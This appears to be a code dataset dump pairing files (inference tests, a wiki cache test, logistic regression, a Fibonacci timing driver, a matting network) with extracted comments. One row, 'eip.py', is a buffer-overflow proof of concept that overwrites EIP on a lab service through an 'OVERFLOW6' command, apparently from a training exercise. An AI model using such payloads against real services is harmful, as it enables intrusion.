content stringlengths 27 928k | path stringlengths 4 230 | size int64 27 928k | nl_text stringlengths 21 396k | nl_size int64 21 396k | nl_language stringlengths 2 3 | nl_language_score float64 0.04 1 |
|---|---|---|---|---|---|---|
# Copyright (c) 2019-2020, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
sys.path.append("../common")
import os
import unittest
import numpy as np
import infer_util as iu
import test_util as tu
# Sentinel numpy dtype used for string/bytes tensors.
np_dtype_string = np.dtype(object)

# Shared-memory test modes are toggled via environment variables; both
# default to off (0) when the variable is unset.
TEST_SYSTEM_SHARED_MEMORY = bool(
    int(os.environ.get('TEST_SYSTEM_SHARED_MEMORY', 0)))
TEST_CUDA_SHARED_MEMORY = bool(int(os.environ.get('TEST_CUDA_SHARED_MEMORY',
                                                  0)))
class InferVariableTest(unittest.TestCase):
    """Test exact inference on models with variable-size input tensors.

    Each ``test_*`` method runs ``_full_exact`` for one combination of
    input/output dtypes and shapes, covering raw outputs, classification
    outputs and mixed raw/classification outputs.
    """

    def _full_exact(self,
                    input_dtype,
                    output0_dtype,
                    output1_dtype,
                    input_shape,
                    output0_shape,
                    output1_shape,
                    output0_raw=True,
                    output1_raw=True,
                    swap=False):
        """Run exact-result inference against every backend (and basic
        ensemble) that supports the given dtype/shape combination.

        Args:
            input_dtype: numpy dtype of both inputs.
            output0_dtype, output1_dtype: numpy dtypes of the outputs.
            input_shape, output0_shape, output1_shape: tensor shapes
                (without the batch dimension).
            output0_raw, output1_raw: when False, request classification
                output instead of the raw tensor.
            swap: use model versions whose outputs swap the inputs.
        """

        def _infer_exact_helper(tester,
                                pf,
                                tensor_shape,
                                batch_size,
                                input_dtype,
                                output0_dtype,
                                output1_dtype,
                                output0_raw=True,
                                output1_raw=True,
                                model_version=None,
                                swap=False,
                                outputs=("OUTPUT0", "OUTPUT1"),
                                use_http=True,
                                use_grpc=True,
                                skip_request_id_check=False,
                                use_streaming=True,
                                correlation_id=0):
            # Run with batch size 1 and with the full batch size.
            for bs in (1, batch_size):
                # model that does not support batching
                if bs == 1:
                    iu.infer_exact(
                        tester,
                        pf + "_nobatch",
                        tensor_shape,
                        bs,
                        input_dtype,
                        output0_dtype,
                        output1_dtype,
                        output0_raw,
                        output1_raw,
                        model_version,
                        swap,
                        outputs,
                        use_http,
                        use_grpc,
                        skip_request_id_check,
                        use_streaming,
                        correlation_id,
                        use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
                        use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)
                # model that supports batching; the batch dimension is
                # prepended to the tensor shape
                iu.infer_exact(
                    tester,
                    pf, (bs,) + tensor_shape,
                    bs,
                    input_dtype,
                    output0_dtype,
                    output1_dtype,
                    output0_raw,
                    output1_raw,
                    model_version,
                    swap,
                    outputs,
                    use_http,
                    use_grpc,
                    skip_request_id_check,
                    use_streaming,
                    correlation_id,
                    use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
                    use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)

        # "" means the plain (non-ensemble) model; any ensemble prefix
        # that validates for this configuration is exercised too.
        all_ensemble_prefix = ["simple_", "sequence_", "fan_"]
        ensemble_prefix = [""]
        for prefix in all_ensemble_prefix:
            if tu.validate_for_ensemble_model(prefix, input_dtype,
                                              output0_dtype, output1_dtype,
                                              input_shape, input_shape,
                                              input_shape):
                ensemble_prefix.append(prefix)

        if tu.validate_for_tf_model(input_dtype, output0_dtype, output1_dtype,
                                    input_shape, output0_shape, output1_shape):
            for prefix in ensemble_prefix:
                for pf in ["graphdef", "savedmodel"]:
                    _infer_exact_helper(self,
                                        prefix + pf,
                                        input_shape,
                                        8,
                                        input_dtype,
                                        output0_dtype,
                                        output1_dtype,
                                        output0_raw=output0_raw,
                                        output1_raw=output1_raw,
                                        swap=swap)

        if tu.validate_for_trt_model(input_dtype, output0_dtype, output1_dtype,
                                     input_shape, output0_shape, output1_shape):
            for prefix in ensemble_prefix:
                if input_dtype == np.int8:
                    # int8 TensorRT models carry an extra (1, 1) spatial dim.
                    _infer_exact_helper(self,
                                        prefix + 'plan',
                                        input_shape + (1, 1),
                                        8,
                                        input_dtype,
                                        output0_dtype,
                                        output1_dtype,
                                        output0_raw=output0_raw,
                                        output1_raw=output1_raw,
                                        swap=swap)
                else:
                    _infer_exact_helper(self,
                                        prefix + 'plan',
                                        input_shape,
                                        8,
                                        input_dtype,
                                        output0_dtype,
                                        output1_dtype,
                                        output0_raw=output0_raw,
                                        output1_raw=output1_raw,
                                        swap=swap)

        if tu.validate_for_c2_model(input_dtype, output0_dtype, output1_dtype,
                                    input_shape, output0_shape, output1_shape):
            for prefix in ensemble_prefix:
                _infer_exact_helper(self,
                                    prefix + 'netdef',
                                    input_shape,
                                    8,
                                    input_dtype,
                                    output0_dtype,
                                    output1_dtype,
                                    output0_raw=output0_raw,
                                    output1_raw=output1_raw,
                                    swap=swap)

        # the custom model is src/custom/addsub... it does not swap
        # the inputs so always set to False
        if tu.validate_for_custom_model(input_dtype, output0_dtype,
                                        output1_dtype, input_shape,
                                        output0_shape, output1_shape):
            # No basic ensemble models are created against custom models
            _infer_exact_helper(self,
                                'custom',
                                input_shape,
                                8,
                                input_dtype,
                                output0_dtype,
                                output1_dtype,
                                output0_raw=output0_raw,
                                output1_raw=output1_raw,
                                swap=False)

        if tu.validate_for_onnx_model(input_dtype, output0_dtype, output1_dtype,
                                      input_shape, output0_shape,
                                      output1_shape):
            # No basic ensemble models are created against custom models [TODO]
            _infer_exact_helper(self,
                                'onnx',
                                input_shape,
                                8,
                                input_dtype,
                                output0_dtype,
                                output1_dtype,
                                output0_raw=output0_raw,
                                output1_raw=output1_raw,
                                swap=swap)

        if tu.validate_for_libtorch_model(input_dtype, output0_dtype,
                                          output1_dtype, input_shape,
                                          output0_shape, output1_shape):
            # No basic ensemble models are created against custom models [TODO]
            _infer_exact_helper(self,
                                'libtorch',
                                input_shape,
                                8,
                                input_dtype,
                                output0_dtype,
                                output1_dtype,
                                output0_raw=output0_raw,
                                output1_raw=output1_raw,
                                swap=swap)

    def test_raw_fff(self):
        self._full_exact(np.float32, np.float32, np.float32, (16,), (16,),
                         (16,))

    def test_raw_fii(self):
        self._full_exact(np.float32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))

    def test_raw_fll(self):
        self._full_exact(np.float32, np.int64, np.int64, (8, 4), (8, 4), (8, 4))

    def test_raw_fil(self):
        self._full_exact(np.float32, np.int32, np.int64, (2, 8, 2), (2, 8, 2),
                         (2, 8, 2))

    def test_raw_ffi(self):
        self._full_exact(np.float32, np.float32, np.int32, (16,), (16,), (16,))

    def test_raw_iii(self):
        self._full_exact(np.int32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))

    # Renamed from test_faw_iif: "faw" was a typo for "raw".
    def test_raw_iif(self):
        self._full_exact(np.int32, np.int32, np.float32, (2, 8, 2), (2, 8, 2),
                         (2, 8, 2))

    def test_raw_ooo(self):
        self._full_exact(np_dtype_string, np_dtype_string, np_dtype_string,
                         (16,), (16,), (16,))

    def test_raw_oii(self):
        self._full_exact(np_dtype_string, np.int32, np.int32, (2, 8), (2, 8),
                         (2, 8))

    def test_raw_ooi(self):
        self._full_exact(np_dtype_string, np_dtype_string, np.int32, (8, 4),
                         (8, 4), (8, 4))

    def test_raw_oio(self):
        self._full_exact(np_dtype_string, np.int32, np_dtype_string, (2, 8, 2),
                         (2, 8, 2), (2, 8, 2))

    def test_class_fff(self):
        self._full_exact(np.float32,
                         np.float32,
                         np.float32, (16,), (16,), (16,),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_fii(self):
        self._full_exact(np.float32,
                         np.int32,
                         np.int32, (2, 8), (2, 8), (2, 8),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_fll(self):
        self._full_exact(np.float32,
                         np.int64,
                         np.int64, (8, 4), (8, 4), (8, 4),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_fil(self):
        self._full_exact(np.float32,
                         np.int32,
                         np.int64, (2, 8, 2), (2, 8, 2), (2, 8, 2),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_ffi(self):
        self._full_exact(np.float32,
                         np.float32,
                         np.int32, (16,), (16,), (16,),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_iii(self):
        self._full_exact(np.int32,
                         np.int32,
                         np.int32, (2, 8), (2, 8), (2, 8),
                         output0_raw=False,
                         output1_raw=False)

    def test_class_iif(self):
        self._full_exact(np.int32,
                         np.int32,
                         np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
                         output0_raw=False,
                         output1_raw=False)

    def test_mix_ffi(self):
        self._full_exact(np.float32,
                         np.float32,
                         np.int32, (16,), (16,), (16,),
                         output0_raw=True,
                         output1_raw=False)

    def test_mix_iii(self):
        self._full_exact(np.int32,
                         np.int32,
                         np.int32, (2, 8), (2, 8), (2, 8),
                         output0_raw=False,
                         output1_raw=True)

    def test_mix_iif(self):
        self._full_exact(np.int32,
                         np.int32,
                         np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
                         output0_raw=True,
                         output1_raw=False)
if __name__ == '__main__':
    # Standard unittest entry point.
    unittest.main()
| qa/L0_infer_variable/infer_variable_test.py | 14,508 | Copyright (c) 2019-2020, NVIDIA CORPORATION. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of NVIDIA CORPORATION nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. model that does not support batching model that supports batching the custom model is src/custom/addsub... it does not swap the inputs so always set to False No basic ensemble models are created against custom models No basic ensemble models are created against custom models [TODO] No basic ensemble models are created against custom models [TODO] | 1,836 | en | 0.909002 |
# -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id: 790cd19ca8b22937365bf24b6e40ed90c79ee12b $'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):

    """Validate the stored API request cache entries."""

    net = False

    def _check_cache_entry(self, entry):
        """Assert that a single cache entry is well-formed."""
        site = entry.site
        self.assertIsInstance(site, BaseSite)
        self.assertIsInstance(site._loginstatus, int)
        self.assertIsInstance(site._username, list)
        if site._loginstatus >= 1:
            # A logged-in site must record the user name.
            self.assertIsNotNone(site._username[0])
        params = entry._params
        self.assertIsInstance(params, dict)
        self.assertIsNotNone(params)
        # TODO: more tests on entry._params, and possibly fixes needed
        # to make it closely replicate the original object.

    def test_cache(self):
        """Walk every entry in the cache directory and validate it."""
        cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
    # Standard unittest entry point.
    unittest.main()
| tests/cache_tests.py | 1,258 | Validate cache entries.
Assert validity of the cache entry.
Test the apicache by doing _check_cache_entry over each entry.
API Request cache tests.
-*- coding: utf-8 -*- (C) Pywikibot team, 2012-2014 Distributed under the terms of the MIT license. TODO: more tests on entry._params, and possibly fixes needed to make it closely replicate the original object. | 361 | en | 0.755548 |
import numpy as np
import math
from ml_from_scratch.activation_functions import Sigmoid
from ml_from_scratch.utils import make_diagonal
class LogisticRegression():
    """Binary logistic regression classifier.

    Parameters
    ----------
    n_iters : int
        Number of parameter-update iterations (default 1000).
    lr : float
        Learning rate used by gradient descent.
    gradient_descent : bool
        When True, train with batch gradient descent; when False, use
        Newton's method.
    """

    def __init__(self, n_iters=1000, lr=.1, gradient_descent=True):
        self.param = None
        self.n_iters = n_iters
        self.lr = lr
        self.gradient_descent = gradient_descent
        self.sigmoid = Sigmoid()

    def _initialize_parameters(self, X):
        # Draw initial weights uniformly from [-1/sqrt(N), 1/sqrt(N)],
        # where N is the number of input features.
        n_features = np.shape(X)[1]
        bound = 1 / math.sqrt(n_features)
        self.param = np.random.uniform(-bound, bound, (n_features,))

    def fit(self, X, y):
        """Fit the model to (X, y) for n_iters iterations."""
        self._initialize_parameters(X)
        for _ in range(self.n_iters):
            y_pred = self.sigmoid(X.dot(self.param))
            if self.gradient_descent:
                # Step against the gradient of the loss w.r.t. the
                # parameters to minimize the loss.
                gradient = (y_pred - y).dot(X)
                self.param = self.param - self.lr * gradient
            else:
                # Newton step: reweight samples by the sigmoid gradient
                # (diagonal matrix) and solve the batch update.
                diag_gradient = make_diagonal(
                    self.sigmoid.gradient(X.dot(self.param)))
                weighted = X.T.dot(diag_gradient)
                target = diag_gradient.dot(X).dot(self.param) + y - y_pred
                self.param = np.linalg.pinv(weighted.dot(X)).dot(X.T).dot(target)

    def predict(self, X):
        """Return hard 0/1 class predictions for X."""
        return np.round(self.sigmoid(X.dot(self.param))).astype(int)

    def predict_proba(self, X):
        """Return predicted class-1 probabilities for X."""
        return self.sigmoid(X.dot(self.param))
| ml_from_scratch/logistic_regression.py | 2,074 | Logistic Regression classifier.
Parameters:
-----------
n_iters: int
Number of iterations running gradient descent, default is 1000
lr: float
learning rate
gradient_descent: boolean
True or false depending if gradient descent should be used when training. If
false then we use Newton Method.
Initialize parameters between [-1/sqrt(N), 1/sqrt(N)] Tune parameters for n iterations Make a new prediction Move against the gradient of the loss function with respect to the parameters to minimize the loss Make a diagonal matrix of the sigmoid gradient column vector Batch opt: | 589 | en | 0.534846 |
#!/usr/bin/env python3
import sys
import psutil
import subprocess
import numpy as np
import matplotlib.pyplot as plt
# Require the number of measurement runs as the single CLI argument.
if (len(sys.argv) < 2):
    print("usage: python3 driver.py <runs>")
    sys.exit(1)

input_file = 'fib_time'   # per-run measurement file written by ./client
output_file = "time.png"  # rendered plot
runs = int(sys.argv[1])   # number of repeated measurement runs
def outlier_filter(data, threshold=2):
    """Drop samples whose absolute z-score is >= threshold.

    Args:
        data: sequence of numeric samples.
        threshold: z-score cutoff; samples at or beyond it are removed.

    Returns:
        numpy array of the retained samples.

    When the standard deviation is zero (all samples identical) the data
    is returned unchanged; the original code divided by zero there,
    produced NaN z-scores and silently discarded every sample.
    """
    data = np.array(data)
    std = data.std()
    if std == 0:
        return data
    z = np.abs((data - data.mean()) / std)
    return data[z < threshold]
def data_processing(data, n):
    """Average each (category, sample) cell across n runs, discarding
    outlier runs first."""
    n_categories, n_samples = data[0].shape
    averaged = np.zeros((n_categories, n_samples))
    for c in range(n_categories):
        for s in range(n_samples):
            cell = [data[i][c][s] for i in range(n)]
            averaged[c][s] = outlier_filter(cell).mean()
    return averaged
if __name__ == '__main__':
    Ys = []
    for i in range(runs):
        # bind process on cpu0 to reduce scheduling noise
        subprocess.run('sudo taskset 0x1 ./client 2>&1 > /dev/null', shell=True)
        # First row of the transposed output holds X (the fib index);
        # the remaining rows are the timing categories.
        output = np.loadtxt(input_file, dtype='float').T
        Ys.append(np.delete(output, 0, 0))
    X = output[0]
    Y = data_processing(Ys, runs)
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    ax.set_title('perf', fontsize=16)
    ax.set_xlabel(r'$n_{th} fibonacci$', fontsize=16)
    ax.set_ylabel('time (ns)', fontsize=16)
    ax.plot(X, Y[0], marker='*', markersize=3, label='user')  # user
    ax.plot(X, Y[1], marker='+', markersize=3, label='kernel')  # kernel
    ax.plot(X, Y[2], marker='^', markersize=3, label='kernel to user')  # kernel to user
    ax.legend(loc = 'upper left')
    plt.subplots_adjust(bottom=0.15)
    plt.savefig(output_file, bbox_inches="tight")
    plt.show()
| scripts/driver.py | 1,661 | !/usr/bin/env python3 bind process on cpu0 user kernel kernel to user | 69 | en | 0.540465 |
import socket
import sys
import time

print("[+] Nani???? EIP!!\n")

# Buffer-overflow PoC: 1034 bytes of filler, 4 bytes landing in EIP,
# then padding — offsets presumably found via a cyclic pattern.
buff = "A" * 1034
EIP = "B" * 4
Fill = "C" * 62
payload = buff + EIP + Fill

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 1337))
s.recv(1024)  # Recv the banner
# Finally the vulnerable command; encoded to bytes so the script runs
# under Python 3 (socket.send rejects str there).
s.send(('OVERFLOW6 ' + payload + '\r\n').encode())
s.send(b'EXIT\r\n')
s.close()
print("[+] Execution Finished")
| 6/eip.py | 437 | Connect to the ApplicationRecv the bannerFinally the vulnerable command | 71 | en | 0.735904 |
"""Main entry point for VarFish CLI."""
import argparse
import logging
import os
import sys
import logzero
import toml
from logzero import logger
from varfish_cli import __version__
from .common import run_nocmd, CommonConfig
from .case import setup_argparse as setup_argparse_case
from .case import run as run_case
#: Paths to search the global configuration in (tried in order; the
#: first existing file wins).
GLOBAL_CONFIG_PATHS = ("~/.varfishrc.toml",)
def setup_argparse_only():  # pragma: nocover
    """Wrapper for ``setup_argparse()`` that only returns the parser.

    Only used in sphinx documentation via ``sphinx-argparse``.
    """
    parser, _subparsers = setup_argparse()
    return parser
def setup_argparse():
    """Build and return the top-level argument parser and its subparsers."""
    # Global options that apply before any sub-command.
    parser = argparse.ArgumentParser(prog="varfish-cli")
    parser.add_argument(
        "--verbose", action="store_true", default=False, help="Increase verbosity.")
    parser.add_argument(
        "--version", action="version", version="%%(prog)s %s" % __version__)

    basic_group = parser.add_argument_group("Basic Configuration")
    basic_group.add_argument(
        "--no-verify-ssl",
        dest="verify_ssl",
        default=True,
        action="store_false",
        help="Disable HTTPS SSL verification",
    )
    basic_group.add_argument(
        "--config",
        default=os.environ.get("VARFISH_CONFIG_PATH", None),
        help="Path to configuration file.",
    )
    basic_group.add_argument(
        "--varfish-server-url",
        default=os.environ.get("VARFISH_SERVER_URL", None),
        help="VarFish server URL key to use, defaults to env VARFISH_SERVER_URL.",
    )
    basic_group.add_argument(
        "--varfish-api-token",
        default=os.environ.get("VARFISH_API_TOKEN", None),
        help="VarFish API token to use, defaults to env VARFISH_API_TOKEN.",
    )

    # One sub-parser per sub-command.
    subparsers = parser.add_subparsers(dest="cmd")
    setup_argparse_case(subparsers.add_parser("case", help="Work with cases."))

    return parser, subparsers
def main(argv=None):
    """Main entry point before parsing command line arguments."""
    # Setup command line parser.
    parser, subparsers = setup_argparse()
    # Actually parse command line arguments.
    args = parser.parse_args(argv)
    # Setup logging incl. verbosity.
    if args.verbose:  # pragma: no cover
        level = logging.DEBUG
    else:
        # Remove module name and line number if not running in debug mode.
        formatter = logzero.LogFormatter(
            fmt="%(color)s[%(levelname)1.1s %(asctime)s]%(end_color)s %(message)s"
        )
        logzero.formatter(formatter)
        level = logging.INFO
    logzero.loglevel(level=level)
    # Load configuration, if any.  An explicit --config wins over the
    # default global search paths.
    if args.config:
        config_paths = (args.config,)
    else:
        config_paths = GLOBAL_CONFIG_PATHS
    for config_path in config_paths:
        config_path = os.path.expanduser(os.path.expandvars(config_path))
        if os.path.exists(config_path):
            with open(config_path, "rt") as tomlf:
                toml_config = toml.load(tomlf)
            break
    else:
        # for/else: no config file was found at any candidate path.
        toml_config = None
        logger.info("Could not find any of the global configuration files %s.", config_paths)
    # Merge configuration from command line/environment args and configuration file.
    config = CommonConfig.create(args, toml_config)
    # Handle the actual command line by dispatching to the sub-command.
    cmds = {None: run_nocmd, "case": run_case}
    res = cmds[args.cmd](
        config, toml_config, args, parser, subparsers.choices[args.cmd] if args.cmd else None
    )
    # A falsy result means success; anything else is an error code.
    if not res:
        logger.info("All done. Have a nice day!")
    else:  # pragma: nocover
        logger.error("Something did not work out correctly.")
    return res
if __name__ == "__main__":  # pragma: no cover
    # Exit with the result code of main() so shells see failures.
    sys.exit(main(sys.argv))
| varfish_cli/__main__.py | 3,826 | Main entry point before parsing command line arguments.
Create argument parser.
Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
Main entry point for VarFish CLI.
: Paths to search the global configuration in. pragma: nocover Construct argument parser and set global options. Add sub parsers for each argument. Setup command line parser. Actually parse command line arguments. Setup logging incl. verbosity. pragma: no cover Remove module name and line number if not running in debug mode.s Load configuration, if any. Merge configuration from command line/environment args and configuration file. Handle the actual command line. pragma: nocover pragma: no cover | 737 | en | 0.451295 |
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
# Dilation rates for the parallel atrous (dilated) convolutions in the
# spatial-pyramid block of the encoder.
ATROUS_RATES = [6, 12, 18]
# Conv-MaxPool SPP 24M
def _unpool_with_skip(x, skip):
    """Upsample x by 2 and unpool it against the matching encoder
    feature map ``skip`` (same shape) to recover spatial detail."""
    x = UpSampling2D(size=(2, 2))(x)
    the_shape = K.int_shape(skip)
    shape = (1, the_shape[1], the_shape[2], the_shape[3])
    skip_reshaped = Reshape(shape)(skip)
    x_reshaped = Reshape(shape)(x)
    together = Concatenate(axis=1)([skip_reshaped, x_reshaped])
    return Unpooling()(together)


def _decoder_stage(x, skip, filters, n_convs, stage):
    """One decoder stage: unpool against ``skip``, then ``n_convs``
    3x3 conv+BN layers named ``deconv{stage}_{i}`` (names match the
    original hand-unrolled implementation so weights stay loadable)."""
    x = _unpool_with_skip(x, skip)
    for i in range(1, n_convs + 1):
        x = Conv2D(filters, (3, 3), activation='relu', padding='same',
                   name='deconv%d_%d' % (stage, i),
                   kernel_initializer='he_normal',
                   bias_initializer='zeros')(x)
        x = BatchNormalization()(x)
    return x


def build_encoder_decoder():
    """Build the VGG-style encoder / unpooling decoder with an
    atrous-spatial-pyramid block; input is 320x320 RGB+trimap (4ch),
    output is a single-channel sigmoid alpha prediction."""
    # Encoder
    input_tensor = Input(shape=(320, 320, 4))
    x = ZeroPadding2D((1, 1))(input_tensor)
    x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
    x = BatchNormalization()(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
    x = BatchNormalization()(x)
    orig_1 = x
    x = MaxPooling2D((2, 2), strides=(2, 2))(x)

    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
    orig_2 = x
    x = MaxPooling2D((2, 2), strides=(2, 2))(x)

    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
    orig_3 = x
    x = MaxPooling2D((2, 2), strides=(2, 2))(x)

    # Atrous spatial pyramid: parallel 1x1 and dilated 3x3 branches.
    inputs_size = x.get_shape()[1:3]
    conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
    conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
    conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
    conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
    # Image average pooling branch, upsampled back to feature size.
    image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
    image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
    image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
    # Concat all branches and fuse with two 1x1 convs.
    x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
    x = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
    x = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
    orig_4 = x
    x = MaxPooling2D((2, 2), strides=(2, 2))(x)

    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
    x = ZeroPadding2D((1, 1))(x)
    x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
    orig_5 = x
    x = MaxPooling2D((2, 2), strides=(2, 2))(x)

    # Decoder: five unpooling stages mirroring the encoder (replaces
    # the original ~90 lines of copy-pasted stage code).
    for skip, filters, n_convs, stage in ((orig_5, 512, 3, 5),
                                          (orig_4, 256, 3, 4),
                                          (orig_3, 128, 3, 3),
                                          (orig_2, 64, 2, 2),
                                          (orig_1, 64, 2, 1)):
        x = _decoder_stage(x, skip, filters, n_convs, stage)

    x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred',
               kernel_initializer='he_normal', bias_initializer='zeros')(x)

    model = Model(inputs=input_tensor, outputs=x)
    return model
def build_refinement(encoder_decoder):
    """Append a refinement head that sharpens the encoder-decoder's
    prediction using the RGB channels of the original input."""
    input_tensor = encoder_decoder.input
    # Keep only the first three (RGB) channels of the 4-channel input.
    rgb = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
    x = Concatenate(axis=3)([rgb, encoder_decoder.output])
    # Three identical conv+BN layers.
    for _ in range(3):
        x = Conv2D(64, (3, 3), activation='relu', padding='same',
                   kernel_initializer='he_normal',
                   bias_initializer='zeros')(x)
        x = BatchNormalization()(x)
    x = Conv2D(1, (3, 3), activation='sigmoid', padding='same',
               name='refinement_pred', kernel_initializer='he_normal',
               bias_initializer='zeros')(x)
    return Model(inputs=input_tensor, outputs=x)
if __name__ == '__main__':
    # Build the models on the CPU so plotting does not allocate GPU memory.
    with tf.device("/cpu:0"):
        encoder_decoder = build_encoder_decoder()
    print(encoder_decoder.summary())
    plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
    with tf.device("/cpu:0"):
        refinement = build_refinement(encoder_decoder)
    print(refinement.summary())
    plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
    # gpus=None presumably lets Keras replicate across all visible GPUs
    # — TODO confirm against the multi_gpu_model docs for this version.
    parallel_model = multi_gpu_model(refinement, gpus=None)
    print(parallel_model.summary())
    plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
    K.clear_session()
| segnet_v7.py | 9,171 | Conv-MaxPool SPP 24M Encoder Image average pooling Concat Decoder | 65 | en | 0.558554 |
# This code is adapted from the https://github.com/tensorflow/models/tree/master/official/r1/resnet.
# ==========================================================================================
# NAVER’s modifications are Copyright 2020 NAVER corp. All rights reserved.
# ==========================================================================================
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
